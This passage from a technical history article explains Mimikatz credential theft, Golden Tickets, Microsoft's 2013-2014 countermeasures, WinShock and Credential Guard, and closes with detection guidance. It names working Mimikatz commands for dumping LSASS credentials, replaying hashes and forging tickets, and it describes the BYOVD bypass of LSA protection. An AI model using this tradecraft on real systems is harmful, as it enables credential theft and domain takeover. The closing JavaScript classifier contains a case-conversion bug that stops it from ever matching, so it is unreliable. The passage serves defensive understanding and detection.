A forged Kerberos Ticket-Granting Ticket signed with the domain's stolen krbtgt key material (the RC4-HMAC key equal to the NT hash, or the krbtgt AES keys). Grants arbitrary user, arbitrary group, and arbitrary lifetime impersonation across every domain controller in the Active Directory forest. Survives every password reset *except* the krbtgt account's own [@delpy-duckwall-bh2014; @metcalf-golden-ticket].

The krbtgt account is the master signing key for the domain's Kerberos infrastructure. Every TGT a domain controller issues is encrypted and signed with a krbtgt long-term key (RC4-HMAC, which is the NT hash, or AES), and the domain trusts any TGT that verifies against that key. If an attacker holding domain-admin privileges has ever extracted the krbtgt hash from a domain controller's LSASS, they can forge a TGT for any user, with any group membership, with any lifetime they choose -- and the domain controllers will accept it as if it had been legitimately issued. The forged ticket survives every routine password reset on the domain because routine password resets do not rotate the krbtgt account. Sean Metcalf's ADSecurity walkthrough remains the practitioner-grade canonical reference [@metcalf-golden-ticket].

4.5 What this proved

By the end of 2014, the Mimikatz codebase had operationalised pass-the-hash, pass-the-ticket, overpass-the-hash, WDigest plaintext recovery, and the Golden Ticket on a default-configured modern Windows host. Every credential the LSA process held in memory in a recoverable form was structurally exposed.

The scope of that claim matters. TPM-bound keys, smart-card private keys behind a hardware boundary, and Kerberos service keys on Windows servers whose LSASS the attacker had not yet compromised were not exposed by Mimikatz. The precise statement is every credential the LSA process held in memory in a recoverable form, not "every Windows credential primitive ever," and the precise statement is the one Microsoft eventually acknowledged in the Mitigating Pass-the-Hash whitepaper series [@ms-pth-v2].

Mimikatz did not need to defeat AppLocker, ASLR, DEP, or Authenticode. It ran as an administrator, called OpenProcess on LSASS, and walked away with every cached credential the operating system would ever hold. The defender's playbook had been answering the wrong question.

Stuxnet was a four-zero-day operation that ran once. Mimikatz was a free, open-source command that ran every time. The offensive economics of attacking Windows fleets shifted decisively away from zero-day-burning and toward credential replay. Why did this happen, and what does it mean for the next decade of Windows defence?

5. The Causal Link: Hardening Birthed the Credential-Theft Class

After two parallel narratives, the reader has the evidence to follow the argument. This is the article's intellectual centre.

5.1 The pivot up the trust stack

While Microsoft was closing per-binary attack surface -- Authenticode, kernel-mode code signing, ASLR, DEP, AppLocker, AppContainer, ELAM, Secure Boot -- attackers pivoted up the trust stack to what those hardened binaries still had to trust: the credentials in LSASS memory, the Kerberos tickets in the LSA cache, and the LSA process address space itself. The mitigation surface and the attack surface are not at the same layer. This is the article's structural insight, and it is the single sentence the rest of the argument exists to defend.

flowchart TD A["Hardware root: TPM, UEFI Secure Boot db/dbx"] B["Bootloader signature chain (Secure Boot, Measured Boot)"] C["Kernel-mode code (KMCS, ELAM as first boot-start driver, PatchGuard)"] D["User-mode signed binaries (Authenticode, AppLocker rules)"] E["Sandboxed renderers (AppContainer, EPM, WinRT)"] F["LSASS process memory: NT hashes, Kerberos TGTs, krbtgt key"] G["Attacker primitive: Mimikatz sekurlsa::logonpasswords"] A --> B --> C --> D --> E --> F G -.reads.-> F style F fill:#fde68a,stroke:#b45309,color:#5f370e style G fill:#fecaca,stroke:#991b1b,color:#7f1d1d

The diagram makes the asymmetry visible. Every defender control protects a layer below LSASS. Mimikatz attacks LSASS directly. None of the per-binary controls is in the attack path because Mimikatz does not need to defeat them -- it runs as a process the per-binary controls approved.

5.2 The Mimikatz codebase as a single causal node

Every credential-replay class that defines the next decade of red-team tradecraft traces to one 2011 codebase. Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Golden Ticket -- all four landed in gentilkiwi/mimikatz. After the GitHub repository creation on April 6, 2014 [@mimikatz-github], the same codebase later grew the post-Part-3 modules (Skeleton Key and DCSync; see §11 FAQ) [@secureworks-skeleton-key; @metcalf-dcsync]. There is no comparable single codebase on the defender side. Microsoft's countermeasures landed across at least three product teams (Active Directory, Windows Defender, Hyper-V), and the architectural answer required a hypervisor.

Because you don't want to fix it, I'll show it to the world to make people aware of it. -- Benjamin Delpy [@greenberg-mimikatz-wired]

Delpy's framing converted a defender's blind spot into a public, weaponised primitive. Microsoft's initial dismissal of his private disclosure -- that the credential model was "by design" -- was true, in the most damaging possible sense. The model was by design. The single sign-on contract required it. Closing the gap required a different design.

5.3 The economic argument

The shift was economic as much as architectural. A reliable Windows zero-day exploit chain commanded a substantial unit price on the early-2010s grey market and burned on first use: once a sample was disclosed and patched, the exploit was worthless to a serious operator. A Mimikatz invocation, by contrast, is free, reusable indefinitely on any pre-Credential-Guard estate, leaves no on-disk footprint, and runs as the operator the attacker already compromised. The asymmetry is not subtle.

Property	Stuxnet (June 2010)	Mimikatz (May 2011 onward)
Attacker cost	Four Windows zero-days + two stolen Authenticode certificates + ICS payload [@symantec-stuxnet-dossier-v14]	Free open-source tool [@mimikatz-github]
Reusability	Single-use; zero-days patched within months [@ms-bulletin-ms10-046; @ms-bulletin-ms10-061; @ms-bulletin-ms10-073; @ms-bulletin-ms10-092]	Indefinite on any pre-Credential-Guard host
On-disk footprint	Multi-megabyte signed dropper + Step 7 / S7 payloads	Single executable; can run in memory
Detection footprint	Symantec / Kaspersky / ESET signatures within weeks of disclosure [@symantec-stuxnet-dossier-v14]	Initially evades signature-based AV; later detected via ProcessAccess masks on LSASS
Target population	Specific ICS estate (Natanz)	Every Windows AD estate
Threat-model implication	Nation-states will burn zero-days for kinetic effect	Anyone with admin can replay every cached credential

Key idea: Defensive success at one layer reliably produces attacker innovation at the next layer up. The 2009-2014 window proves it: Microsoft killed the rootkit, bootkit, and unsigned-bootloader classes; attackers responded by reading the credentials in LSASS memory that every hardened binary still had to trust. The mitigation surface and the attack surface were not at the same layer.

If the credential layer was structurally broken, why didn't Microsoft just fix it? They tried. The next section is the honest evaluation of Microsoft's counter-pivot through November 2014.

6. Microsoft's Counter-Pivot: 2013-2014

Microsoft was not asleep. By Windows 8.1 General Availability on October 17, 2013, three controls landed that were directly a response to Mimikatz. They were partial wins, all of them; the architectural acknowledgement that LSASS-in-VTL0 was unsalvageable would arrive only with Virtualisation-Based Security and Credential Guard in Windows 10 1507 [@ms-credential-guard], outside this article's window. This section is the honest evaluation of what shipped, what it accomplished, and why none of it was enough.

6.1 Restricted Admin RDP

Restricted Admin RDP changes the Remote Desktop Protocol so that the client never sends the user's plaintext password to the server's LSASS [@kb2871997]. Instead, the server issues a Network Level Authentication challenge that the client signs using its local NT hash; the user authenticates to the remote desktop session as a network logon rather than an interactive logon. Critical credential material is never present on the RDP server.

The bug Restricted Admin closes is the credential-disclosure failure mode: a foothold on the RDP server used to learn every administrator's plaintext password as they logged in. The bug it leaves open is replay. A Restricted Admin RDP session is a network logon, and an attacker holding the NT hash for an administrative account can invoke sekurlsa::pth /run:"mstsc /restrictedadmin" from a compromised host and authenticate to the target RDP server using only the hash. Restricted Admin reduced disclosure; it did not close replay.

sequenceDiagram participant C as RDP Client participant S as RDP Server (LSASS) Note over C,S: Classic RDP (credential delegation) C->>S: TLS handshake plus plaintext credentials S->>S: LSASS caches plaintext password for session Note over S: Foothold on server reveals every admin password Note over C,S: Restricted Admin RDP (post-KB2871997) C->>S: Network Level Authentication challenge request S->>C: server nonce C->>C: sign nonce with local NT hash C->>S: signed response S->>S: verify against domain controller Note over S: Server never sees plaintext Note over C: Attacker with NT hash can still run mstsc with restrictedadmin

Server-side Restricted Admin shipped at Windows 8.1 / Server 2012 R2 General Availability on October 17, 2013. The client-side back-port to Windows 7, Server 2008 R2, Windows 8, and Server 2012 followed via KB2871997 on May 13, 2014 [@kb2871997], which is also where the WDigest opt-out and TokenLeakDetectDelaySecs primitives shipped.

6.2 LSA Protected Process (RunAsPPL)

LSA Protected Process loads LSASS as a Protected Process Light with the signer level PsProtectedSignerLsa. Once Protected, the Windows kernel refuses any OpenProcess(PROCESS_VM_READ) call against LSASS from a process running at a lower signer level -- including a process running as NT AUTHORITY\SYSTEM with SeDebugPrivilege [@ms-lsa-protection]. The flag is enabled by setting HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL to 1. RunAsPPL is the strongest credential-protection primitive Microsoft shipped inside Windows 8.1.

A kernel-enforced signer level that prevents OpenProcess(PROCESS_VM_READ) and CreateRemoteThread against the protected process from any process running at a lower signer level, regardless of token privileges or session [@itm4n-lsa-protection; @ms-lsa-protection]. The Lsa variant requires every LSA plug-in DLL (SSP, AP, custom credential providers) to itself be signed at a compatible signer level, which is why enabling RunAsPPL on real estates requires an LSA plug-in audit.

The bypass class is Bring Your Own Vulnerable Driver. A malicious kernel-mode driver, loaded through a vulnerable but Microsoft-signed third-party driver that the attacker has placed on disk, can clear the Protection byte in the kernel EPROCESS structure for LSASS, after which the OpenProcess(PROCESS_VM_READ) call succeeds. Mimikatz ships its own kernel driver, mimidrv.sys, that performs exactly this manipulation [@mimikatz-github]. The structural problem is that RunAsPPL is enforced by the same kernel an attacker is compromising to bypass it; the protection cannot be made strictly stronger inside the same privilege ring than the kernel that enforces it.

A common misreading is that PPL is a partial Credential Guard, or that Credential Guard replaces PPL. The most useful framing is itm4n's: *"I noticed that this protection tends to be confused with Credential Guard, which is completely different"* [@itm4n-lsa-protection]. PPL is a same-privilege gate inside VTL0 -- both LSASS and the attacker live in the same kernel address space, and the kernel decides whether to grant a process handle. Credential Guard is a cross-privilege isolation between VTL0 and VTL1 (the Virtual Trust Levels Hyper-V introduces in Windows 10 1507) [@ms-credential-guard]: the credential material lives in a Virtual Secure Mode trustlet (LSAISO) that the VTL0 kernel cannot read because the hypervisor's Second-Level Address Translation tables deny the mapping. The two controls are complementary -- PPL hardens LSASS against in-VTL0 attackers; Credential Guard moves the high-value secret out of VTL0 entirely. §8.3 develops the cross-privilege isolation argument formally.

6.3 The Mitigating Pass-the-Hash whitepaper series

Microsoft published the Mitigating Pass-the-Hash and Other Credential Theft whitepaper in two versions: v1 in December 2012 from the Trustworthy Computing group [@ms-pth-v1-landing] and v2 in July 2014 [@ms-pth-v2]. There is no v3. Post-2014 guidance migrated into the Securing Privileged Access online documentation rather than appearing as a numbered v3 PDF, and any "v3 2017" reference is incorrect.

The v1 paper introduced the tier 0 / tier 1 / tier 2 administrative-account model: separate the accounts that manage the forest (tier 0: domain controllers, AD), the accounts that manage server applications (tier 1: file servers, Exchange, SQL), and the accounts that manage end-user workstations (tier 2: helpdesk, desktop support). The rule is that a tier-N credential must never be exposed on a tier-(N+1) host. The model is sound. The problem is that v1 was recommendations-only with no enforcement primitive inside the operating system, and operators routinely violated tiering (the helpdesk technician fixing the CEO's laptop with a tier-2 credential and then RDPing to a tier-1 file server exposes the credential at the laptop's LSASS). The v2 paper integrated the technical D5 controls (RunAsPPL, Restricted Admin, KB2871997) precisely because v1 alone could not move the needle on real estates.

6.4 KB2871997 and the WDigest opt-out

The May 13, 2014 update KB2871997 is the single most operationally impactful credential-protection control of the entire window [@kb2871997]. It carried three deliverables. First, the Restricted Admin client back-port to Windows 7 / Server 2008 R2 / Windows 8 / Server 2012, which Section 6.1 covers. Second, the HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0 registry default that disabled WDigest plaintext credential storage in LSASS memory on a freshly patched system. Third, the HKLM\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDelaySecs (default 30 seconds) cleanup of leaked logon-session credentials.

Note: The WDigest opt-out (UseLogonCredential = 0) has zero operational downside on any post-2010 estate -- HTTP Digest authentication is essentially extinct in the enterprise -- and removes the most-cited credential-recovery primitive Mimikatz used through 2014 [@kb2871997]. It ships with the same back-port that brings Restricted Admin to down-level Windows. There is no defensible argument for not applying it on any supported Windows from 2014 onward.

The WDigest opt-out was buried in the KB2871997 bulletin because the headline framing was Restricted Admin RDP; many 2014-era administrators applied the patch for the RDP fix without realising the WDigest default had also changed [@kb2871997].

6.5 The seeds of Credential Guard

By late 2014 Microsoft was already prototyping the Hyper-V-as-security-boundary architecture that becomes Virtualisation-Based Security, Credential Guard, and Hypervisor-protected Code Integrity in Windows 10 1507 on July 29, 2015 [@ms-credential-guard]. For the Part 3 reader, the key observation is that Microsoft had already concluded by mid-2014 that no amount of in-VTL0 hardening could close the credential-replay gap structurally, and that the architectural answer required moving the credential cache to a different privilege domain than the kernel attackers compromise.

Key idea: Restricted Admin reduced disclosure but not replay. RunAsPPL stopped a Mimikatz invocation only until BYOVD. The Pass-the-Hash tiering model named the problem but had no enforcement primitive inside the operating system. Microsoft's counter-pivot in the Part 3 window was correct in direction and insufficient by construction -- because the architecture was the problem, not the engineering.

Microsoft shipped the right primitives. None of them was sufficient by construction, because the architecture was the problem. To see why, we have to look at the one structural thing the window left open: the SChannel attack surface, and the impossibility argument behind it.

7. The SChannel Coda: WinShock (MS14-066, November 11, 2014)

The window closes on November 11, 2014 with the last great pre-cloud TLS-stack remote code execution in Windows. WinShock is a counterpoint that reinforces the article's thesis rather than contradicting it: even with every credential-layer control of 2013-2014 deployed, an unrelated per-binary defect in the Schannel TLS stack could still hand an attacker remote code execution before any application code ran. The credential-layer hardening Microsoft spent the year shipping could not have prevented this bug, and the bug's existence is part of the evidence that hardening one layer leaves orthogonal layers exposed.

A note up front, because the popular framing got this wrong. The bulletin itself was not silent. MS14-066 was published on the November 11, 2014 Patch Tuesday with a Critical severity rating, an explicit CVE assignment (CVE-2014-6321), contemporary Brian Krebs coverage [@krebs-ms14-066], and public proof-of-concept walkthroughs within months [@nvd-cve-2014-6321]. The "silent" framing applies only to the additional Schannel hardening fixes Microsoft bundled into the same update without separate disclosures.

7.1 The mechanism

A crafted TLS handshake triggered a memory-corruption path inside schannel.dll, the Windows Secure Channel security package that implements TLS for every in-box TLS consumer [@ms-bulletin-ms14-066; @nvd-cve-2014-6321]. The bug allowed remote code execution before any application code ran -- the handshake itself was the attack. The NVD entry catalogues the affected platforms as Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 -- essentially every supported Windows of the era [@nvd-cve-2014-6321].

The attack surface was universal across the Windows enterprise estate of late 2014. Every IIS host terminating HTTPS, every SMB-over-HTTPS endpoint, every RDP-over-TLS listener, every Exchange ActiveSync endpoint, every Active Directory Federation Services endpoint terminating TLS in Schannel was exposed. A defensible writer-side abstraction (which this article takes) is that a crafted handshake triggered a memory-corruption path; the precise internal type and function family Microsoft fixed are not safely attributable without a primary-source walkthrough beyond the bulletin's published abstract.

7.2 The bundled extras

Microsoft bundled additional Schannel hardening into MS14-066 without separate bulletins. The article does not name specific CVE IDs for those bundled extras because prior pipeline runs found such attributions factually wrong (those CVE IDs belong to other bulletins or are REJECTED in NVD). The defensible framing is that Microsoft bundled additional Schannel hardening into the same update without separate bulletins, anchored to contemporary coverage of the patch cycle [@krebs-ms14-066]. The substantive point survives without speculative CVE attribution.

The "no public exploitation" framing of MS14-066 is wrong. BeyondTrust's "Triggering MS14-066" blog post and the SecuritySift "Exploiting MS14-066 (CVE-2014-6321) aka 'Winshock'" walkthrough are both referenced from the NVD entry as Exploit Third Party Advisory [@nvd-cve-2014-6321]. The CVE was patched, and the exploitation tradecraft was public; only the bundled hardening extras went unannotated.

7.3 Strategic significance

WinShock is the bookend on an era when the Windows Schannel stack was the front door of every enterprise. After 2014, TLS termination for major Windows estates increasingly happened at Azure Front Door, Akamai, Cloudflare, or AWS Application Load Balancer rather than at the Windows Schannel layer. Microsoft's own first-party services -- Exchange Online, SharePoint Online, the Office 365 ingress fleet -- terminated TLS at Azure-managed edge appliances, the topology documented in Microsoft's Microsoft 365 network connectivity principles as the recommended "connect locally to the Microsoft global network" architecture in which the customer's traffic enters Microsoft's network as close to the user as possible and TLS is terminated at the nearest edge node [@ms-365-network-principles]. The architectural lesson is not that Schannel was uniquely fragile; it is that monolithic TLS stacks across hundreds of in-box consumers were a brittle design that the industry stopped accepting as the default deployment topology for enterprise services.

WinShock closed the window with a per-binary patch. But the bigger story -- the credential layer Microsoft had spent the year trying to close -- was structurally broken in a way no patch could fix. To see why, we have to make the impossibility argument formally.

8. Theoretical Limits: Why No Per-Binary Hardening Could Fix the Credential Layer

A reframe. Every section so far has narrated evidence. This section turns that evidence into an argument from architecture -- a structural reason the per-binary playbook could not have fixed the credential layer, regardless of how good Microsoft's engineering was.

8.1 The trusted-computing-base argument

Every authenticated Windows process must, at some point, hold a verifiable secret. As §4.1 established, the single sign-on contract forces LSASS to hold a recoverable secret in memory [@ms-credentials-processes]. As long as that secret lives in a memory space the OS can read, an attacker who reaches that memory space can read it too.

AppLocker, ASLR, DEP, AppContainer, ELAM, and Secure Boot are all per-binary mitigations [@ms-applocker; @ms-elam; @ms-secure-boot]. They prevent the wrong code from running. They do not prevent the right code (an administrator-launched Mimikatz; a Microsoft-signed but vulnerable third-party kernel driver) from reading LSASS memory through documented Win32 APIs. The per-binary playbook is a code-execution control, not a memory-access control, and the credential-theft attack is not a code-execution attack.

8.2 The asymmetry

The defender must close 100% of the per-binary attack surface to prevent a single piece of attacker code from running. The attacker needs only one credential primitive to remain extractable to win. The two budgets are not comparable. The defender's job is exponentially harder by construction, and any single residual gap -- one unsigned plug-in, one cached WDigest plaintext, one stolen NT hash -- gives the attacker domain-wide replay. This is not a Microsoft engineering failure. It is an architectural inevitability of the in-VTL0 LSASS model.

8.3 The VTL0-symmetry argument

In any single-privilege-ring operating system, no protection mechanism implemented inside that ring can structurally defend a memory region against an attacker who reaches that ring. This is the formal statement of the limit Microsoft hit in 2014.

RunAsPPL is the strongest 2014-era expression of this bound. As §6.2 documented, a BYOVD-loaded kernel driver can clear the Protection byte on the LSASS EPROCESS and OpenProcess(PROCESS_VM_READ) succeeds [@itm4n-lsa-protection; @ms-lsa-protection]; the protection is enforced by the same kernel the attacker is compromising; the kernel cannot enforce a protection against itself.

The architectural way to state it: $\text{Protection}{\text{in-ring}}(M) \lt \text{Adversary}{\text{in-ring}}(M)$ for any memory region $M$ in the same privilege ring as the adversary. The protection function and the adversary function operate on the same domain, and the adversary always wins by construction. The algebraic notation is informal; the formal capture is the Bell-LaPadula / Lampson confinement bound, which states that in a single-privilege-ring system an adversary who reaches that ring can read any memory the kernel can map [@wikipedia-bell-lapadula]. Closing the gap requires moving $M$ to a privilege domain $\text{D}'$ such that the in-ring adversary cannot map $\text{D}'$ at all.

That is exactly what Virtualisation-Based Security does in Windows 10 1507 [@ms-credential-guard]. Hyper-V boots before the Windows kernel and creates two Virtual Trust Levels: VTL0 is the normal Windows kernel attackers compromise; VTL1 is Virtual Secure Mode, an isolated execution domain whose memory the VTL0 kernel cannot read because the hypervisor's Second-Level Address Translation tables deny the mapping. Credential Guard hosts an LSA Isolated trustlet (LSAISO) in VTL1 that holds the high-value credential material; the VTL0 LSASS process holds only obfuscated references that LSAISO can resolve. A Mimikatz invocation in VTL0 can still extract the references, but the references no longer dereference to a credential the VTL0 kernel can read.

As long as the kernel that protects LSASS executes in the same privilege ring as the kernel an attacker compromises, every protection inside that ring is bypassable. The credential cache must live in a different privilege domain than the kernel that the attacker can compromise.

8.4 The way out, foreshadowed

Hardware-rooted isolation of the credential cache is the only structural answer. Virtualisation-Based Security, Credential Guard, and the LSAISO trustlet in VTL1 -- the spine of Part 4 -- are the architectural answer to the architectural problem the Part 3 window proves cannot be closed inside VTL0 [@ms-credential-guard]. The article closes the Part 3 argument by naming the problem precisely so Part 4 can name the solution precisely.

Key idea: Hardware-rooted isolation of the credential cache -- the LSAISO trustlet in a VTL1 the VTL0 kernel cannot read -- is the only structural answer. Part 4 ships it. Part 3 names why it had to.

The architecture was the problem. What did practitioners do with this evidence at the end of 2014?

9. Open Problems at the End of 2014

Picture a Fortune-500 security operations centre on a Friday afternoon in early December 2014. The team has applied every Microsoft patch through MS14-066 [@ms-bulletin-ms14-066], deployed AppLocker on Enterprise SKUs [@ms-applocker], set RunAsPPL = 1 after a careful LSA plug-in audit [@ms-lsa-protection], applied KB2871997 to disable WDigest plaintext storage [@kb2871997], and read the Mitigating Pass-the-Hash v2 whitepaper cover to cover [@ms-pth-v2]. They run an internal red-team exercise the following Monday. Mimikatz still works. Why?

The credential layer is still essentially open. WDigest plaintext storage is now opt-out by default on freshly patched hosts, which closes the single most embarrassing primitive Delpy's 2011 demonstration exposed [@kb2871997]. But the cached NT hashes that NTLM authentication needs, the Kerberos Ticket-Granting Tickets the SSO contract holds in the LSA ticket cache, and the krbtgt master signing key on any domain controller whose LSASS the attacker can OpenProcess against all remain extractable [@mimikatz-github; @ms-credentials-processes]. RunAsPPL stops a Mimikatz invocation from user mode, but it does not stop Mimikatz from invoking its own mimidrv.sys driver (or any other vulnerable signed third-party driver) to clear the protection byte from kernel mode and proceed [@itm4n-lsa-protection; @mimikatz-github]. The same sekurlsa::logonpasswords that worked in May 2011 still works in December 2014 on every estate that has not stripped its third-party drivers down to a zero-BYOVD baseline -- which is no real estate at all.

One open problem the security community debated through 2014 deserves a sharper treatment because it surfaces the structural limit of any in-LSASS hardening strategy: why does Microsoft not simply relocate or obfuscate the LSA secret structures whose offsets Mimikatz hard-codes? The Mimikatz codebase carries explicit, per-Windows-build signature and offset tables (for example the lsasrv LogonSessionList table in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c, with package-specific offsets such as WDigest in kuhl_m_sekurlsa_wdigest.c) that map every supported Windows build to the byte offsets and signature byte sequences Mimikatz scans for at run time [@mimikatz-sekurlsa-source]. The maintenance cost on the offensive side is one row per shipped Windows build per quarter. The proposed defensive response -- shuffle the struct layouts each cumulative update, randomise the symbol offsets, swap the byte signatures -- fails as a defence for three independent reasons. First, cost asymmetry. Microsoft would commit the test, validation, and Windows Hardware Quality Labs re-certification cost of every layout shuffle across every supported Windows SKU, language pack, and architecture every quarter; Mimikatz's maintainers would commit one pull request and one signature-table row per build. Second, defender-side fragility. The same LSASS structures the offsets index are consumed by Microsoft's own security tooling, by every third-party Endpoint Detection and Response agent, and by Windows Error Reporting; randomising the layout breaks the defender's own dependencies first and the attacker's last. Third, adversary-side robustness. Mimikatz already supports pattern-based signature scanning that finds the target structures even when their absolute offsets move; the offset hard-coding is a performance optimisation, not a requirement. The only structural defence is the one the engineering pipeline is already building: lift the credential cache out of the VTL0 user-mode process space entirely and into a Virtualisation-Based Security trustlet whose memory the VTL0 kernel cannot read. Alex Ionescu's Black Hat USA 2015 "Battle of SKM and IUM" talk lays out the VTL1 / IUM architecture in operator-facing detail and forward-references the Credential Guard design that ships in Windows 10 1507 [@ionescu-skm-ium-bhusa15]. The Part 3 community could see the answer; the architectural prerequisites simply had not yet shipped.

Microsoft is prototyping Virtualisation-Based Security and Credential Guard, but the architectural answer ships outside this article's window [@ms-credential-guard]. Even after it ships, Credential Guard requires Windows 10 Enterprise, UEFI 2.3.1, Secure Boot, a 64-bit CPU with virtualisation extensions, and -- on most estates -- a hardware refresh cycle that costs years and millions. The deployment surface that needs the protection most cannot adopt it until well into 2017.

AppLocker still carries its Windows 7 structural gaps in late 2014: the Application Identity service can be stopped by any process running as LocalSystem, after which enforcement degrades open until reboot, and the dual-DACL bypass class (rules that pass both Publisher and Path checks but reach a different binary at runtime) remains unaddressed [@ms-applocker; @ms-applocker-design]. Windows Defender Application Control -- the kernel-enforced policy successor that closes both gaps -- is still a Windows 10 enterprise feature in the Part 4 window. Secure Boot has its first dbx revocation politics in this window: Microsoft's revocation list has to retire compromised UEFI bootloaders without bricking dual-boot Linux installations on the millions of OEM machines that ship with Secure Boot enabled, and the cadence and scope of dbx updates becomes a recurring operational point of friction between Microsoft, OEMs, and the Linux distribution community [@ms-secure-boot; @mjg59-shim-signed]. The Pass-the-Hash v2 tiering recommendations are aspirational for the vast majority of 2014 deployments -- a complete tier 0 / tier 1 / tier 2 administrative-account programme is a multi-year project that requires Active Directory restructuring, change-management governance, and operator retraining at scale, and most estates that read the v2 paper applied KB2871997 and stopped there [@ms-pth-v2].

Mimikatz's post-Part-3 modules (Skeleton Key and DCSync; see §11 FAQ) sit in the same codebase, are anchor events in the Part 4 window, and define the credential-replay horizon the Part 3 reader is staring at [@secureworks-skeleton-key; @metcalf-dcsync].

The defining open question at the end of 2014 is how Microsoft isolates a long-lived user-mode process (LSASS) holding the most valuable secrets in the operating system from an administrator-privileged attacker on the same host, without breaking the hundreds of in-tree dependencies LSASS has accumulated since NT 3.1. The answer -- Virtualisation-Based Security plus the trustlet model -- is the spine of Part 4. It requires a hypervisor, a hardware-rooted boot chain, a re-architected LSA plug-in protocol that splits sensitive operations into LSAISO trustlet calls, and an operational deployment story that took Microsoft from late 2014 prototypes to general availability in 2015 and broad enterprise adoption only by 2018-2019.

Note: At the end of 2014, WDigest plaintext storage is closed by default. NT hashes, Kerberos TGTs, the krbtgt master key, and every other secret LSASS holds in recoverable form remain extractable by any administrator on the same host who can load a kernel driver. The architectural answer -- Credential Guard in Windows 10 1507 -- ships eight months later [@ms-credential-guard]. The Part 3 window proves the problem is real; Part 4 ships the answer.

Even at end-of-2014, with every Microsoft control available, the dominant Fortune-500 estate had applied the WDigest opt-out [@kb2871997] and almost nothing else. Tiering [@ms-pth-v2] is a multi-year programme. RunAsPPL [@ms-lsa-protection] requires an LSA plug-in audit that breaks any custom credential provider not yet re-signed at the PPL signer level. The architectural answer -- Credential Guard in 2015 [@ms-credential-guard] -- arrives to a deployment surface still struggling to deploy the 2013 controls. The gap between *the security primitive Microsoft shipped* and *the security primitive a Fortune-500 estate actually had running* was the largest it had ever been, and it grew through the Windows 10 1507 General Availability window.

Eight open problems. None of them admits a Part 3-era technical solution. So how does a practitioner read the 2009-2014 primitives against a 2026 Windows 11 baseline?

10. Practical Guide: Reading the 2009-2014 Primitives Against a 2026 Windows 11 Baseline

The previous nine sections built the structural argument. This section answers the operator's question: which of these 2009-2014 primitives are still load-bearing in 2026, and which were superseded?

10.1 Which Part 3 primitives are still load-bearing in 2026

Primitive (Part 3)	Still in use 2026?	Superseded by
AppLocker (Win 7+) [@ms-applocker]	Yes, on Windows 10/11 Enterprise estates	App Control for Business (WDAC) for new deployments
ELAM (Win 8+) [@ms-elam]	Yes, load-bearing for the boot chain on every supported Windows	Unchanged primitive; Defender's WdBoot.sys is the in-box ELAM driver
UEFI Secure Boot (Win 8+) [@ms-secure-boot]	Yes; mandatory for Windows 11 hardware certification	Strengthened with mandatory dbx revocation enforcement
AppContainer (Win 8+) [@windows-internals-6e-p1]	Yes; substrate for MSIX, Edge renderers, Win32 App Isolation, Recall trustlet	Generalised across all packaged Win32 apps via App Isolation
LSA Protected Process (Win 8.1+) [@ms-lsa-protection]	Yes; on by default on new installations of Windows 11 22H2 and later (upgraded systems retain default-off and require manual or GPO enablement)	Complemented by Credential Guard on enterprise hardware
Restricted Admin RDP (Win 8.1+) [@kb2871997]	Yes; still recommended	Remote Credential Guard (Win 10 1607+) for high-tier environments
WDigest plaintext disablement (KB2871997) [@kb2871997]	Default on every supported Windows since 2014	Unchanged primitive; WDigest itself is essentially deprecated
Mitigating Pass-the-Hash tiering model [@ms-pth-v2]	Yes; lives on as Privileged Access Workstations and Enterprise Access Model	Securing Privileged Access online documentation

Two surprises in the table. First, LSA Protected Process is on by default on new installations of Windows 11 22H2 and later -- which closes the gap for newly-shipped devices, though estates that upgraded from earlier Windows versions still require the manual or GPO enablement step that defined the 2014-2020 period. Second, AppLocker is still in production on enterprise estates ten-plus years after Windows 7 General Availability; the WDAC successor is the recommendation for new deployments, but the installed AppLocker base did not get replaced.

10.2 Mimikatz tradecraft as the floor of red-team capability

On any pre-Credential-Guard Windows estate -- and that is still a non-trivial fraction of the 2026 install base -- Mimikatz's 2011-2014 module set defines the floor of red-team capability. sekurlsa::logonpasswords reads every LSA-cached credential the operator's privileges allow [@mimikatz-github]. sekurlsa::tickets /export extracts every Kerberos ticket from the LSA cache. lsadump::secrets reads LSA private secrets. lsadump::sam reads local SAM hashes. kerberos::ptt re-imports tickets for replay. kerberos::golden forges Golden Tickets given a stolen krbtgt hash [@metcalf-golden-ticket]. The Part 3 window's primitives are the foundation any practitioner reasoning about lateral movement in a Windows-AD estate uses every day, and the conceptual model Sean Metcalf documented on ADSecurity.org remains the canonical operator-grade reference.

10.3 Detection

Where to look. Sysmon ProcessAccess events on LSASS (event ID 10) with Granted Access masks of 0x1010, 0x1410, or 0x143A correspond to the read-and-decrypt access pattern Mimikatz's sekurlsa::logonpasswords requires; the masks decompose into PROCESS_VM_READ + PROCESS_QUERY_LIMITED_INFORMATION (0x1010), plus PROCESS_VM_OPERATION (0x1410), plus PROCESS_VM_WRITE + PROCESS_CREATE_THREAD (0x143A), and are widely-attested operator-grade detection lore catalogued across EDR vendor blogs and MITRE ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory) sub-techniques [@mitre-t1003-001]. Windows Security event 4673 (sensitive privilege use) on SeDebugPrivilege fires when a process adjusts its token to enable debug privileges -- the prerequisite for privilege::debug -- which is interesting in itself when the actor is not a known debugger. System Access Control Lists on the krbtgt account, paired with Domain Controller audit subcategories for Kerberos AS-REQ and TGS-REQ, surface the AS-REQ-without-corresponding-logon anomalies that Golden Ticket use produces [@metcalf-golden-ticket]. Microsoft Defender for Identity raises Suspected Golden Ticket and Suspected Skeleton Key alerts on its analysis of domain-controller telemetry (the Skeleton Key alert is a Part 4 forward reference).

{` // Conceptual classifier for Sysmon event ID 10 (ProcessAccess) targeting LSASS. // The canonical "read-and-decrypt" mask pattern Mimikatz needs to call // OpenProcess + ReadProcessMemory + BCryptDecrypt against LSASS. function isMimikatzLikely(event) { if (event.id !== 10) return false; if (!/lsass.exe$/i.test(event.targetImage)) return false; const interesting = new Set(['0x1010', '0x1410', '0x143A']); return interesting.has(event.grantedAccess.toLowerCase().toUpperCase()); }

const sample = { id: 10, targetImage: 'C:\\Windows\\System32\\lsass.exe', grantedAccess: '0x1410', sourceImage: 'C:\\tools\\mimikatz.exe' };

